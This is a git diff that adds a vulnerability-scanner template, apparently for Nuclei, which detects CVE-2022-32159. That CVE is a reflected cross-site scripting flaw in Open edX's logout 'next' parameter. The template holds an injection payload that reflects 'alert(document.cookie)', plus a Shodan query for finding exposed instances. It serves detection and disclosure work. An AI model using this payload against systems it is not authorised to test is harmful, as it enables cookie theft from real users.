diff --git a/cves/2022/CVE-2022-32159.yaml b/cves/2022/CVE-2022-32159.yaml new file mode 100644 index 0000000000..9a7073e34c --- /dev/null +++ b/cves/2022/CVE-2022-32159.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-32159 + +info: + name: Open edX - Cross-site Scripting + author: arafatansari + severity: medium + description: | + Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL. + reference: + - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32159 + metadata: + shodan-query: http.html:"Open edX" + verified: "true" + tags: xss,cve,2022 + +requests: + - method: GET + path: + - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.cookie)' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'onmouseover="alert(document.cookie)' + condition: and